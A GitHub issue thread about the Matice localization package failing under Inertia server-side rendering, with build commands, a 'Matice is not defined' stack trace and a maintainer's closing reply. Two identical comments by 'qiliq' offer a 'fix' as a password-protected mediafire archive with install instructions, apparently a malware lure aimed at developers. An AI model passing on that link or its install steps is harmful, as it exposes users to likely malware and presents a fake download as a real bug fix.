### ISSUE TITLE
Bug with inertia SSR

### ISSUE THREAD

**Issue by sbc640964** [GENL/matice#47]
### Versions

- **Laravel**: 10.48.20
- **Matice**: 1.1.5
- **Matice larave**:1.1.9

### Bug
This package is not working on ssr (inertia ssr)

The commands I ran
```
npm run build // vite build && vite build --ssr
```

```
php artisan matice:generate
```

```
php artisan inertia:start-ssr

//Result:
Starting SSR server on port 13714...
Inertia SSR server started.
ReferenceError: Matice is not defined
    at new Localization (/home/sbc/Documents/Projects/ad-sheyovo/node_modules/matice/dist/Localization/core.js:26:53)
    at Function.get (/home/sbc/Documents/Projects/ad-sheyovo/node_modules/matice/dist/Localization/core.js:35:42)
    at __ (/home/sbc/Documents/Projects/ad-sheyovo/node_modules/matice/dist/Localization/core.js:235:25)
    at Front (file:///home/sbc/Documents/Projects/ad-sheyovo/bootstrap/ssr/assets/Front-b140ac4a.js:52:23)
    at renderWithHooks (/home/sbc/Documents/Projects/ad-sheyovo/node_modules/react-dom/cjs/react-dom-server-legacy.node.development.js:5662:16)
    at renderIndeterminateComponent (/home/sbc/Documents/Projects/ad-sheyovo/node_modules/react-dom/cjs/react-dom-server-legacy.node.development.js:5735:15)
    at renderElement (/home/sbc/Documents/Projects/ad-sheyovo/node_modules/react-dom/cjs/react-dom-server-legacy.node.development.js:5950:7)
    at renderNodeDestructiveImpl (/home/sbc/v/Projects/ad-sheyovo/node_modules/react-dom/cjs/react-dom-server-legacy.node.development.js:6108:11)
    at renderNodeDestructive (/home/sbc/Documents/Projects/ad-sheyovo/node_modules/react-dom/cjs/react-dom-server-legacy.node.development.js:6080:14)
    at renderContextProvider (/home/sbc/Documents/Projects/ad-sheyovo/node_modules/react-dom/cjs/react-dom-server-legacy.node.development.js:5924:3)
```

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sbc640964** [comment]
?

**Comment by GENL** [comment]
Thanks for reporting this. I'll take a look at it,

**Comment by GENL** [comment]
Hi @sbc640964, I could not replicate this bug, hense, I'll close this issue. Feel free to re-open it if you're still experiencing this bug, and to share with me more details about your implementation.
Thank ya!
